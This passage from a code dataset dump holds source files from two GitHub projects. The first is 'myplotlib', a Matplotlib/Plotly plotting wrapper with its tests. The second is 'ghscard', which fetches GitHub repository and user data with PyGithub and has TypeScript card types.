standards of myplotlib.\n\t\tdel(kwargs) # Remove it to avoid double access to the properties.\n\t\tself.plotly_fig.add_trace(\n\t\t\tself.plotly_go.Scatter(\n\t\t\t\tx = validated_args['x'],\n\t\t\t\ty = validated_args['y'],\n\t\t\t\tname = validated_args.get('label'),\n\t\t\t\topacity = validated_args.get('alpha'),\n\t\t\t\tmode = self.translate_marker_and_linestyle_to_mode(validated_args.get('marker'), validated_args.get('linestyle')),\n\t\t\t\tmarker_symbol = self._map_marker_to_plotly(validated_args.get('marker')),\n\t\t\t\tshowlegend = True if validated_args.get('label') != None else False,\n\t\t\t\tline = dict(\n\t\t\t\t\tdash = self.LINESTYLE_TRANSLATION[validated_args.get('linestyle')] if 'linestyle' in validated_args else None,\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\t\tif validated_args.get('color') != None:\n\t\t\tself.plotly_fig['data'][-1]['marker']['color'] = self._rgb2hexastr_color(validated_args.get('color'))\n\t\tif validated_args.get('linewidth') != None:\n\t\t\tself.plotly_fig['data'][-1]['line']['width'] = validated_args.get('linewidth')\n\t\n\tdef fill_between(self, x, y1, y2=None, **kwargs):\n\t\tvalidated_args = super().fill_between(x, y1, y2, **kwargs) # Validate arguments according to the standards of myplotlib.\n\t\tdel(kwargs) # Remove it to avoid double access to the properties.\n\t\tx = validated_args['x']\n\t\tvalidated_args.pop('x')\n\t\ty1 = validated_args['y1']\n\t\tvalidated_args.pop('y1')\n\t\ty2 = validated_args['y2']\n\t\tvalidated_args.pop('y2')\n\t\tself.plot(\n\t\t\tx = list(x) + list(x)[::-1],\n\t\t\ty = list(y1) + list(y2)[::-1],\n\t\t\t**validated_args,\n\t\t)\n\t\tself.plotly_fig['data'][-1]['fill'] = 'toself'\n\t\tself.plotly_fig['data'][-1]['hoveron'] = 'points'\n\t\tself.plotly_fig['data'][-1]['line']['width'] = 0\n\t\n\tdef error_band(self, x, y, ytop, ylow, **kwargs):\n\t\tvalidated_args = super().error_band(x, y, ytop, ylow, **kwargs) # Validate arguments according to the standards of myplotlib.\n\t\tdel(kwargs) # Remove it 
to avoid double access to the properties.\n\t\tx = validated_args['x']\n\t\tvalidated_args.pop('x')\n\t\ty = validated_args['y']\n\t\tvalidated_args.pop('y')\n\t\tytop = validated_args['ytop']\n\t\tvalidated_args.pop('ytop')\n\t\tylow = validated_args['ylow']\n\t\tvalidated_args.pop('ylow')\n\t\tlegendgroup = str(np.random.rand()) + str(np.random.rand())\n\t\tself.plot(x, y, **validated_args)\n\t\tself.plotly_fig['data'][-1]['legendgroup'] = legendgroup\n\t\tself.fill_between(\n\t\t\tx, \n\t\t\tylow, \n\t\t\tytop,\n\t\t\tcolor = validated_args['color'],\n\t\t)\n\t\tself.plotly_fig['data'][-1]['showlegend'] = False\n\t\tself.plotly_fig['data'][-1]['legendgroup'] = legendgroup\n\t\n\tdef hist(self, samples, **kwargs):\n\t\tvalidated_args = super().hist(samples, **kwargs) # Validate arguments according to the standards of myplotlib.\n\t\tdel(kwargs) # Remove it to avoid double access to the properties.\n\t\tself.plotly_fig.add_traces(\n\t\t\tself.plotly_go.Scatter(\n\t\t\t\tx = validated_args['bins'], \n\t\t\t\ty = validated_args['counts'],\n\t\t\t\tmode = self.translate_marker_and_linestyle_to_mode(validated_args.get('marker'), validated_args.get('linestyle')),\n\t\t\t\topacity = validated_args.get('alpha'),\n\t\t\t\tname = validated_args.get('label'),\n\t\t\t\tshowlegend = True if validated_args.get('label') != None else False,\n\t\t\t\tline = dict(\n\t\t\t\t\tshape='hvh',\n\t\t\t\t\tdash = self.LINESTYLE_TRANSLATION[validated_args.get('linestyle')] if 'linestyle' in validated_args else None,\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\t\t# ~ self.fig.update_layout(barmode='overlay')\n\t\tif validated_args.get('color') != None:\n\t\t\tself.plotly_fig['data'][-1]['marker']['color'] = self._rgb2hexastr_color(validated_args.get('color'))\n\t\tif validated_args.get('linewidth') != None:\n\t\t\tself.plotly_fig['data'][-1]['line']['width'] = validated_args.get('linewidth')\n\t\n\tdef hist2d(self, _______, **kwargs):\n\t\t# ~ validated_args = super().hist(samples, **kwargs) # Validate 
arguments according to the standards of myplotlib.\n\t\t# ~ del(kwargs) # Remove it to avoid double access to the properties.\n\t\traise NotImplementedError(f'<hist2d> not yet implemented for {self.__class__.__name__}')\n\t\n\tdef colormap(self, z, x=None, y=None, **kwargs):\n\t\tvalidated_args = super().colormap(z, x, y, **kwargs) # Validate arguments according to the standards of myplotlib.\n\t\tdel(kwargs) # Remove it to avoid double access to the properties.\n\t\tz = np.array(validated_args.get('z'))\n\t\tvalidated_args.pop('z')\n\t\tx = validated_args.get('x')\n\t\tvalidated_args.pop('x')\n\t\ty = validated_args.get('y')\n\t\tvalidated_args.pop('y')\n\t\tif x is not None and y is not None:\n\t\t\tif x.size == y.size == z.size:\n\t\t\t\tx = x[0]\n\t\t\t\ty = y.transpose()[0]\n\t\tz2plot = z\n\t\tif 'norm' in validated_args and validated_args['norm'] == 'log':\n\t\t\tif (z<=0).any():\n\t\t\t\twarnings.warn('Warning: log color scale was selected and there are <z> values <= 0. They will be replaced by float(\"NaN\") values for plotting (i.e. 
they will not appear in the plot).')\n\t\t\t\tz2plot[z2plot<=0] = float('NaN')\n\t\t\tz2plot = np.log(z2plot)\n\t\tself.plotly_fig.add_trace(\n\t\t\tself.plotly_go.Heatmap(\n\t\t\t\tz = z2plot,\n\t\t\t\tx = x,\n\t\t\t\ty = y,\n\t\t\t\tcolorbar = dict(\n\t\t\t\t\ttitle = (('log ' if validated_args.get('norm') == 'log' else '') + validated_args.get('colorscalelabel')) if validated_args.get('colorscalelabel') is not None else None,\n\t\t\t\t\ttitleside = 'right',\n\t\t\t\t),\n\t\t\t\thovertemplate = f'{(self.xlabel if self.xlabel is not None else \"x\")}: %{{x}}<br>{(self.ylabel if self.ylabel is not None else \"y\")}: %{{y}}<br>{(validated_args.get(\"colorscalelabel\") if \"colorscalelabel\" in validated_args is not None else \"color scale\")}: %{{z}}<extra></extra>', # https://community.plotly.com/t/heatmap-changing-x-y-and-z-label-on-tooltip/23588/6\n\t\t\t)\n\t\t)\n\t\tself.plotly_fig.update_layout(legend_orientation=\"h\")\n\t\n\tdef contour(self, z, x=None, y=None, **kwargs):\n\t\tvalidated_args = super().colormap(z, x, y, **kwargs) # Validate arguments according to the standards of myplotlib.\n\t\tdel(kwargs) # Remove it to avoid double access to the properties.\n\t\tif 'levels' in validated_args:\n\t\t\t# See in Matplotlib's documentation to see what this is supposed to do.\n\t\t\traise NotImplementedError(f'<levels> not yet implemented for <contour> for Plotly.')\n\t\tz = np.array(validated_args.get('z'))\n\t\tvalidated_args.pop('z')\n\t\tx = validated_args.get('x')\n\t\tvalidated_args.pop('x')\n\t\ty = validated_args.get('y')\n\t\tvalidated_args.pop('y')\n\t\tif x is not None and y is not None:\n\t\t\tif x.size == y.size == z.size:\n\t\t\t\tx = x[0]\n\t\t\t\ty = y.transpose()[0]\n\t\tz2plot = z\n\t\tif 'norm' in validated_args and validated_args['norm'] == 'log':\n\t\t\tif (z<=0).any():\n\t\t\t\twarnings.warn('Warning: log color scale was selected and there are <z> values <= 0. They will be replaced by float(\"NaN\") values for plotting (i.e. 
they will not appear in the plot).')\n\t\t\t\tz2plot[z2plot<=0] = float('NaN')\n\t\t\tz2plot = np.log(z2plot)\n\t\tself.plotly_fig.add_trace(\n\t\t\tself.plotly_go.Contour(\n\t\t\t\tz = z2plot,\n\t\t\t\tx = x,\n\t\t\t\ty = y,\n\t\t\t\tcolorbar = dict(\n\t\t\t\t\ttitle = (('log ' if validated_args.get('norm') == 'log' else '') + validated_args.get('colorscalelabel')) if validated_args.get('colorscalelabel') is not None else None,\n\t\t\t\t\ttitleside = 'right',\n\t\t\t\t),\n\t\t\t\thovertemplate = f'{(self.xlabel if self.xlabel is not None else \"x\")}: %{{x}}<br>{(self.ylabel if self.ylabel is not None else \"y\")}: %{{y}}<br>{(validated_args.get(\"colorscalelabel\") if \"colorscalelabel\" in validated_args is not None else \"color scale\")}: %{{z}}<extra></extra>', # https://community.plotly.com/t/heatmap-changing-x-y-and-z-label-on-tooltip/23588/6\n\t\t\t\tcontours=dict(\n\t\t\t\t\tcoloring = 'heatmap',\n\t\t\t\t\tshowlabels = True, # show labels on contours\n\t\t\t\t\tlabelfont = dict( # label font properties\n\t\t\t\t\t\tcolor = 'white',\n\t\t\t\t\t)\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\t\tself.plotly_fig.update_layout(legend_orientation=\"h\")\n\t\n\tdef _rgb2hexastr_color(self, rgb_color: tuple):\n\t\t# Assuming that <rgb_color> is a (r,g,b) tuple.\n\t\tcolor_str = '#'\n\t\tfor rgb in rgb_color:\n\t\t\tcolor_hex_code = hex(int(rgb*255))[2:]\n\t\t\tif len(color_hex_code) < 2:\n\t\t\t\tcolor_hex_code = f'0{color_hex_code}'\n\t\t\tcolor_str += color_hex_code\n\t\treturn color_str\n\t\n\tdef _map_marker_to_plotly(self, marker):\n\t\tif marker is None:\n\t\t\treturn None\n\t\tmarkers_map = {\n\t\t\t'.': 'circle',\n\t\t\t'+': 'cross',\n\t\t\t'x': 'x',\n\t\t\t'o': 'circle-open',\n\t\t}\n\t\treturn markers_map[marker]\n\t\n\tdef translate_marker_and_linestyle_to_mode(self, marker, linestyle):\n\t\tif marker == None and linestyle != 'none':\n\t\t\tmode = 'lines'\n\t\telif marker != None and linestyle != 'none':\n\t\t\tmode = 'lines+markers'\n\t\telif marker != None and 
linestyle == 'none':\n\t\t\tmode = 'markers'\n\t\telse:\n\t\t\tmode = 'lines'\n\t\treturn mode\n" }, { "alpha_fraction": 0.5987342000007629, "alphanum_fraction": 0.6215189695358276, "avg_line_length": 21.571428298950195, "blob_id": "c24d14b132a523522dcff88376bfc5b24bcec999", "content_id": "7edb1cb440ea9b2cbe379af420e6112a40434ff2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 790, "license_type": "permissive", "max_line_length": 54, "num_lines": 35, "path": "/tests/test_hist.py", "repo_name": "SengerM/myplotlib", "src_encoding": "UTF-8", "text": "import myplotlib as mpl\nimport numpy as np\n\nsamples = [np.random.randn(999)*2*i for i in range(3)]\n\nfor package in ['matplotlib', 'plotly']:\n\tfig = mpl.manager.new(\n\t\ttitle = f'simple histogram with {package}',\n\t\tsubtitle = f'This is a test',\n\t\txlabel = 'x axis',\n\t\tylabel = 'y axis',\n\t\tpackage = package,\n\t)\n\tfor idx,s in enumerate(samples):\n\t\tfig.hist(\n\t\t\ts,\n\t\t\tlabel = f'Plain histogram {idx}',\n\t\t\tlinestyle = ['solid','dashed','dotted'][idx],\n\t\t)\n\t\n\tfig = mpl.manager.new(\n\t\ttitle = f'specifying bins with {package}',\n\t\tsubtitle = f'This is a test',\n\t\txlabel = 'x axis',\n\t\tylabel = 'y axis',\n\t\tpackage = package,\n\t)\n\tfor idx,s in enumerate(samples):\n\t\tfig.hist(\n\t\t\ts,\n\t\t\tbins = 5 if idx==0 else [0,2,3,3.5,4.4,4.5,4.6],\n\t\t\tlabel = f'Plain histogram {idx}',\n\t\t)\n\t\nmpl.manager.save_all()\n" }, { "alpha_fraction": 0.6911299824714661, "alphanum_fraction": 0.6933171153068542, "avg_line_length": 37.10185241699219, "blob_id": "e7fc77d19056b823649a76a5a758fb6ec9466e67", "content_id": "f6a7749fa7c36c7c3ce870b17771bf3226935db6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4115, "license_type": "permissive", "max_line_length": 144, "num_lines": 108, "path": "/myplotlib/__init__.py", "repo_name": "SengerM/myplotlib", 
"src_encoding": "UTF-8", "text": "from .wrapper_matplotlib import MPLMatplotlibWrapper\nfrom .wrapper_plotly import MPLPlotlyWrapper\nfrom .wrapper_saods9 import MPLSaoImageDS9Wrapper\nfrom .utils import get_timestamp\nimport os\nimport __main__\nfrom pathlib import Path\nimport warnings\n\nwarnings.warn(f'The package \"myplotlib\" is deprecated, not maintained anymore. Please use \"grafica\" instead https://github.com/SengerM/grafica')\n\nclass FigureManager:\n\tdef __init__(self):\n\t\tself.set_plotting_package('plotly')\n\t\tself.figures = []\n\t\n\tdef set_plotting_package(self, package):\n\t\tIMPLEMENTED_PACKAGES = ['matplotlib', 'plotly', 'ds9']\n\t\tif package not in IMPLEMENTED_PACKAGES:\n\t\t\traise ValueError('<package> must be one of ' + str(IMPLEMENTED_PACKAGES))\n\t\tself.plotting_package = package\n\t\n\tdef new(self, **kwargs):\n\t\tpackage_for_this_figure = kwargs.get('package') if 'package' in kwargs else self.plotting_package\n\t\tif 'package' in kwargs: kwargs.pop('package')\n\t\tif package_for_this_figure == 'plotly':\n\t\t\tself.figures.append(MPLPlotlyWrapper())\n\t\telif package_for_this_figure == 'matplotlib':\n\t\t\tself.figures.append(MPLMatplotlibWrapper())\n\t\telif package_for_this_figure == 'ds9':\n\t\t\tself.figures.append(MPLSaoImageDS9Wrapper())\n\t\tself.figures[-1].set(**kwargs)\n\t\tif 'title' not in kwargs:\n\t\t\tself.figures[-1].set(title = f'figure_{len(self.figures)}', show_title = False)\n\t\treturn self.figures[-1]\n\t\n\t# ~ def set_style(self, style):\n\t\t# ~ PLOTTING_STYLES = ['latex one column', 'latex two columns']\n\t\t# ~ style = style.lower()\n\t\t# ~ if style not in PLOTTING_STYLES:\n\t\t\t# ~ raise ValueError('<style> must be one of ' + str(PLOTTING_STYLES))\n\t\t# ~ elif style == 'latex one column' and self.plotting_package == 'matplotlib':\n\t\t\t# ~ plt.style.use(os.path.dirname(os.path.abspath(__file__)) + '/rc_styles/latex_one_column_rc_style')\n\t\t# ~ elif style == 'latex two columns' and 
self.plotting_package == 'matplotlib':\n\t\t\t# ~ plt.style.use(os.path.dirname(os.path.abspath(__file__)) + '/rc_styles/latex_two_columns_rc_style')\n\t\n\tdef save_all(self, timestamp=False, mkdir=True, format='png', delete_all=True, *args, **kwargs):\n\t\t\"\"\"\n\t\tUse this function to save all plots made with the current manager at once.\n\t\t\n\t\tArguments\n\t\t---------\n\t\ttimestamp : bool, optional \n\t\t\tDefault: False\n\t\t\tIf true then all file names will be identified with one (and the\n\t\t\tsame) timestamp. The timestamp is created at the moment this \n\t\t\tfunction is called. If you call this function twice, you'll have \n\t\t\ttwo different timestamps.\n\t\t\tThis is usefull when you want not to overwrite the plots each \n\t\t\ttime you run your code. Let's say you are doing a simulation and you\n\t\t\twant to keep the plots of each different run, then you can use\n\t\t\t\"timestamp = True\".\n\t\tmkdir : str or True/False\n\t\t\tDefault: True\n\t\t\tIf a string is passed then a directory will be created (with the\n\t\t\tspecified name) and all figures will be saved in there. If True\n\t\t\tthe name for the directory is the same as the name of the top\n\t\t\tlevel python script that called this function. If False, no directory\n\t\t\tis created an figures are saved in the current working directory.\n\t\tformat : string, optional\n\t\t\tDefault: 'png'\n\t\t\tFormat of image files. Default is 'png'. 
\n\t\t\"\"\"\n\t\tcurrent_timestamp = get_timestamp()\n\t\tif mkdir != False:\n\t\t\tif isinstance(mkdir, Path):\n\t\t\t\tmkdir = str(mkdir)\n\t\t\tif mkdir == True:\n\t\t\t\tmkdir = __main__.__file__.replace('.py', '') + '_saved_plots'\n\t\t\tdirectory = mkdir + '/'\n\t\t\tif not os.path.exists(directory):\n\t\t\t\tos.makedirs(directory)\n\t\telse:\n\t\t\tdirectory = './'\n\t\tfor k,_fig in enumerate(self.figures):\n\t\t\tfile_name = current_timestamp + ' ' if timestamp == True else ''\n\t\t\tfile_name += _fig.title if _fig.title != None else 'figure ' + str(k+1)\n\t\t\t_fig.save(fname = str(Path(f'{directory}/{file_name}.{format}')), *args, **kwargs)\n\t\tif delete_all == True:\n\t\t\tself.delete_all()\n\t\n\tdef show(self):\n\t\tfor fig in self.figures:\n\t\t\tfig.show()\n\t\n\tdef delete(self, fig):\n\t\tself.figures.remove(fig)\n\t\tfig.close()\n\t\n\tdef delete_all_figs(self):\n\t\tfor fig in self.figures:\n\t\t\tfig.close()\n\t\tself.figures = []\n\t\n\tdef delete_all(self):\n\t\tself.delete_all_figs()\n\nmanager = FigureManager()\n" }, { "alpha_fraction": 0.5930831432342529, "alphanum_fraction": 0.5967622995376587, "avg_line_length": 17.616437911987305, "blob_id": "a654017a991f236836031d8b179eab1916c65439", "content_id": "71dc8f01695b275f4a34d65fa498acc42d9d2b7c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1359, "license_type": "permissive", "max_line_length": 50, "num_lines": 73, "path": "/tests/test_contour_colormap.py", "repo_name": "SengerM/myplotlib", "src_encoding": "UTF-8", "text": "import myplotlib as mpl\nimport numpy as np\n\nx = np.linspace(-1,1)\ny = x\nxx, yy = np.meshgrid(x,y)\nzz = xx**4 + yy**2 + np.random.rand(*xx.shape)*.1\n\n\nfor package in ['matplotlib', 'plotly']:\n\tfig = mpl.manager.new(\n\t\ttitle = f'colormap with {package} linear scale',\n\t\tsubtitle = f'This is a test',\n\t\txlabel = 'x axis',\n\t\tylabel = 'y axis',\n\t\tpackage = package,\n\t\taspect = 
'equal',\n\t)\n\tfig.colormap(\n\t\tx = xx,\n\t\ty = yy,\n\t\tz = zz,\n\t\tcolorscalelabel = 'Colormap value',\n\t)\n\t\n\tfig = mpl.manager.new(\n\t\ttitle = f'contour with {package} linear scale',\n\t\tsubtitle = f'This is a test',\n\t\txlabel = 'x axis',\n\t\tylabel = 'y axis',\n\t\tpackage = package,\n\t\taspect = 'equal',\n\t)\n\tfig.contour(\n\t\tx = xx,\n\t\ty = yy,\n\t\tz = zz,\n\t\tcolorscalelabel = 'Colormap value',\n\t)\n\t\n\tfig = mpl.manager.new(\n\t\ttitle = f'colormap with {package} log scale',\n\t\tsubtitle = f'This is a test',\n\t\txlabel = 'x axis',\n\t\tylabel = 'y axis',\n\t\tpackage = package,\n\t\taspect = 'equal',\n\t)\n\tfig.colormap(\n\t\tx = xx,\n\t\ty = yy,\n\t\tz = zz,\n\t\tcolorscalelabel = 'Colormap value',\n\t\tnorm = 'log',\n\t)\n\t\n\tfig = mpl.manager.new(\n\t\ttitle = f'contour with {package} log scale',\n\t\tsubtitle = f'This is a test',\n\t\txlabel = 'x axis',\n\t\tylabel = 'y axis',\n\t\tpackage = package,\n\t\taspect = 'equal',\n\t)\n\tfig.contour(\n\t\tx = xx,\n\t\ty = yy,\n\t\tz = zz,\n\t\tcolorscalelabel = 'Colormap value',\n\t\tnorm = 'log',\n\t)\n\nmpl.manager.save_all()\n" } ]
13
thombashi/ghscard
https://github.com/thombashi/ghscard
297f005d10e620a1683ccf792ff5f18a9053292f
bda862f9148f45b832b8eda125d8dc8240f8a386
cfb489b95ee4bb376ad54042ca1e6e9d9feee3bd
refs/heads/master
2023-08-13T19:50:32.832361
2023-03-11T15:15:31
2023-03-11T15:15:31
85,590,529
11
0
MIT
2017-03-20T15:01:32
2021-10-02T10:07:08
2023-07-20T07:48:02
JavaScript
[ { "alpha_fraction": 0.6277056336402893, "alphanum_fraction": 0.6277056336402893, "avg_line_length": 22.100000381469727, "blob_id": "c466dd60a3546ce02f1e217eb38cc0f68e68f7aa", "content_id": "9f95a286df3f5a0a0676c4a7cf972ee3d0a3293b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 462, "license_type": "permissive", "max_line_length": 66, "num_lines": 20, "path": "/src/card/organization/medium.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { UiSize } from \"../../types\";\nimport { AbstractOrgCardGerator } from \"./base_organization\";\n\nexport class MediumOrgCardGerator extends AbstractOrgCardGerator {\n protected get headerSize(): UiSize {\n return \"large\";\n }\n\n protected get infoSize(): UiSize {\n return \"medium\";\n }\n\n protected get popupSize(): UiSize {\n return \"medium\";\n }\n\n protected get avatarColumnWide(): string {\n return \"eight\";\n }\n}\n" }, { "alpha_fraction": 0.6201192736625671, "alphanum_fraction": 0.6214656829833984, "avg_line_length": 35.87234115600586, "blob_id": "8987cd822015e9a125ebcfb39e9e661954a121ce", "content_id": "c09efb18d6acff82f14fe0a0552162a8198d4850", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5199, "license_type": "permissive", "max_line_length": 100, "num_lines": 141, "path": "/ghscard/fetcher/_repository.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. 
codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nimport random\nimport time\nfrom typing import Any, Dict, List, cast\n\nimport typepy\n\nfrom .._const import DATETIME_FORMAT, RETRY_COUNT, CardType, CommonCardKey, Result\nfrom ._base import AbstractCardDataFetcher, CardData\nfrom ._common import dump_organization, to_chart_data\n\n\ndef ghc_client_thread_helper(ghc_client) -> Dict[str, Any]:\n return {\n \"branches_count\": ghc_client.branches_count,\n \"pulls_count\": ghc_client.pulls_count,\n \"subscribers_count\": ghc_client.repo.get(\"subscribers_count\"),\n \"license\": ghc_client.repo.get(\"license\"),\n }\n\n\ndef get_contributors_count_helper(ghc_client) -> Dict[str, Any]:\n return {\"contributors_count\": ghc_client.contributors_count}\n\n\ndef get_tags_count_helper(ghc_client) -> Dict[str, Any]:\n return {\"tags_count\": ghc_client.tags_count}\n\n\ndef get_open_issues_helper(repo) -> Dict[str, Dict[str, list]]:\n import collections\n\n issue_counter = None\n\n for issue in repo.get_issues():\n label_names = [label.name for label in issue.labels]\n if not label_names:\n label_names = [\"not set\"]\n\n if issue_counter is None:\n issue_counter = collections.Counter(label_names)\n else:\n issue_counter += collections.Counter(label_names)\n\n return {\n \"open_issues\": to_chart_data(\n cast(collections.Counter, issue_counter), aggregate_threshold=7\n )\n }\n\n\nclass RepositoryCardDataFetcher(AbstractCardDataFetcher):\n @property\n def type(self) -> str:\n return CardType.REPOSITORY\n\n def fetch(self) -> CardData:\n self._logger.debug(f\"fetching repository data: id={self.id}\")\n\n thread_list = [\n self._pool.apply_async(ghc_client_thread_helper, args=[self._ghc_client]),\n self._pool.apply_async(get_contributors_count_helper, args=[self._ghc_client]),\n self._pool.apply_async(get_tags_count_helper, args=[self._ghc_client]),\n ]\n\n card_data = super().fetch()\n repo = self._pygh_client.get_repo(self.id)\n\n 
thread_list.append(self._pool.apply_async(get_open_issues_helper, args=[repo]))\n\n card_data[CommonCardKey.AVATAR_URL] = repo.owner.avatar_url\n card_data[CommonCardKey.CARD_TYPE] = CardType.REPOSITORY\n card_data[CommonCardKey.CREATED_AT] = repo.created_at.strftime(DATETIME_FORMAT)\n card_data[CommonCardKey.DESCRIPTION] = repo.description\n card_data[CommonCardKey.EMOJIS] = self._get_emoji_mapping(repo.description)\n card_data[CommonCardKey.HTML_URL] = repo.html_url\n card_data[CommonCardKey.NAME] = repo.name\n card_data[CommonCardKey.UPDATED_AT] = repo.updated_at.strftime(DATETIME_FORMAT)\n\n languages = repo.get_languages()\n\n card_data[\"forks_count\"] = repo.forks_count\n card_data[\"has_issues\"] = repo.has_issues\n card_data[\"has_wiki\"] = repo.has_wiki\n card_data[\"language\"] = repo.language\n card_data[\"languages\"] = to_chart_data(languages, aggregate_threshold=4)\n card_data[\"languages_count\"] = len(languages)\n card_data[\"owner_name\"] = repo.owner.name\n card_data[\"owner_html_url\"] = repo.owner.html_url\n card_data[\"open_issues_count\"] = repo.open_issues_count\n card_data[\"organization\"] = dump_organization(repo.organization)\n card_data[\"repo_homepage\"] = None if typepy.is_null_string(repo.homepage) else repo.homepage\n card_data[\"stargazers_count\"] = repo.stargazers_count\n card_data[\"topics\"] = self.__get_topics()\n\n for i in range(RETRY_COUNT):\n try:\n card_data[\"participation\"] = repo.get_stats_participation().all # type: ignore\n except AttributeError:\n max_sleep_secs = 2**i # noqa\n self._logger.warn(\n f\"failed to get '{self.id}' participation stats. 
retrying in 5 seconds\"\n )\n card_data[\"participation\"] = []\n time.sleep(random.random())\n continue\n\n break\n else:\n self._logger.error(\"failed to get participation stats\")\n card_data[CommonCardKey.RESULT] = Result.ERROR\n\n card_data[\"commits_last_year\"] = sum(cast(List[int], card_data[\"participation\"]))\n\n try:\n card_data[\"latest_tag\"] = repo.get_tags()[0].name\n except IndexError:\n self._logger.debug(\"tag not found in the repository\")\n\n for i, thread in enumerate(thread_list):\n thead_id = f\"thread {i + 1:d}/{len(thread_list):d}\"\n self._logger.debug(f\"wait for {thead_id}\")\n card_data.update(thread.get())\n self._logger.debug(f\"complete {thead_id}\")\n\n return card_data\n\n # def __get_releases(self):\n # return self._ghc_client.get(\"/repos/{:s}/releases\".format(self.id))\n\n def __get_topics(self) -> List[str]:\n values = self._ghc_client.get(\n f\"/repos/{self.id:s}\",\n headers={\"accept\": \"application/vnd.github.mercy-preview+json\"},\n )\n # get topics: https://developer.github.com/v3/repos/\n\n return cast(List[str], values.get(\"topics\"))\n" }, { "alpha_fraction": 0.4576271176338196, "alphanum_fraction": 0.6610169410705566, "avg_line_length": 18.66666603088379, "blob_id": "fe1dd89de8eb4ae9ef5e75b6494ce66d79ecdb26", "content_id": "fdc4c508cc3913ea9f5cbe62deb18a6c6dda925a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 236, "license_type": "permissive", "max_line_length": 24, "num_lines": 12, "path": "/requirements/requirements.txt", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "appconfigpy>=2.0.0,<3\nclick>=6.2,<9\ncolorama>=0.3.7,<1\nLogbook>=0.12.3,<2\nDateTimeRange>=2.1.0,<3\nmsgfy>=0.1.0,<1\npath>=13,<17\npathvalidate>=2.5.0,<4\nPyGithub>=1.43.7,<2\nretryrequests>=0.0.2,<1\ntypepy>=1.1.4,<2\ntyping-extensions>=3.7.4\n" }, { "alpha_fraction": 0.6386138796806335, "alphanum_fraction": 0.6386138796806335, "avg_line_length": 
20.263158798217773, "blob_id": "3108fd4423dfefe1bafdc78557ea1785bf3b68a6", "content_id": "b9d8b534fb0f424f0f2d8503a8b4bb76f7b63c31", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 404, "license_type": "permissive", "max_line_length": 55, "num_lines": 19, "path": "/ghscard/_logger.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nimport logbook\nimport typepy\n\n\ndef get_logger(log_level: int, extra_name: str):\n logger_name_list = []\n if typepy.is_not_null_string(extra_name):\n logger_name_list.append(extra_name)\n\n logger = logbook.Logger(\" \".join(logger_name_list))\n logger.level = log_level\n if log_level == logbook.NOTSET:\n logger.disable()\n\n return logger\n" }, { "alpha_fraction": 0.6072772741317749, "alphanum_fraction": 0.6135508418083191, "avg_line_length": 17.9761905670166, "blob_id": "bd27a3bb894d2bed150a7c039afbf43dd0e77226", "content_id": "4410b28d80c96bc33b9816ed826531420b3c949e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 797, "license_type": "permissive", "max_line_length": 64, "num_lines": 42, "path": "/ghscard/_const.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. 
codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nPROGRAM_NAME = \"ghscard\"\n\nCARD_DATA_VERSION = 2\nDATETIME_FORMAT = \"%Y-%m-%dT%H:%M:%S%z\"\nMAX_PER_PAGE = 100\nRETRY_COUNT = 3\n\n\nclass AppConfigKey:\n GITHUB_API_ACCESS_TOKEN = \"github_api_personal_access_token\"\n OUTPUT_DIR = \"output_dir\"\n INDENT = \"indent\"\n\n\nclass CardType:\n USER = \"User\"\n ORGANIZATION = \"Organization\"\n REPOSITORY = \"Repository\"\n\n\nclass CommonCardKey:\n AVATAR_URL = \"avatar_url\"\n CARD_TYPE = \"card_type\"\n CREATED_AT = \"created_at\"\n DESCRIPTION = \"description\"\n EMOJIS = \"emojis\"\n FETCHD_AT = \"fetched_at\"\n HTML_URL = \"html_url\"\n ID = \"id\"\n NAME = \"name\"\n RESULT = \"result\"\n UPDATED_AT = \"updated_at\"\n VERSION = \"data_version\"\n\n\nclass Result:\n SUCCESS = \"success\"\n ERROR = \"error\"\n" }, { "alpha_fraction": 0.5473790168762207, "alphanum_fraction": 0.5473790168762207, "avg_line_length": 18.643564224243164, "blob_id": "177c7b7ba5bc35a9ae90076c76d5f758cbf6f399", "content_id": "c56221339afc437ea5d24b03b30b8c535f713485", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1984, "license_type": "permissive", "max_line_length": 77, "num_lines": 101, "path": "/src/types.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "export type DateTimeKey = \"created_at\" | \"fetched_at\" | \"updated_at\";\n\ntype CommonCardDataKey =\n | DateTimeKey\n | \"avatar_url\"\n | \"card_type\"\n | \"description\"\n | \"html_url\"\n | \"id\"\n | \"name\"\n | \"version\";\n\nexport type CardStyle = \"medium\" | \"small\" | \"tiny\";\n\nexport type CardType = \"organization\" | \"repository\" | \"user\";\n\nexport type ElementDisplay = \"block\" | \"none\";\n\nexport type UiColor =\n | \"red\"\n | \"orange\"\n | \"yellow\"\n | \"olive\"\n | \"green\"\n | \"teal\"\n | \"blue\"\n | \"violet\"\n | \"purple\"\n | \"pink\"\n | \"brown\"\n | \"grey\"\n | 
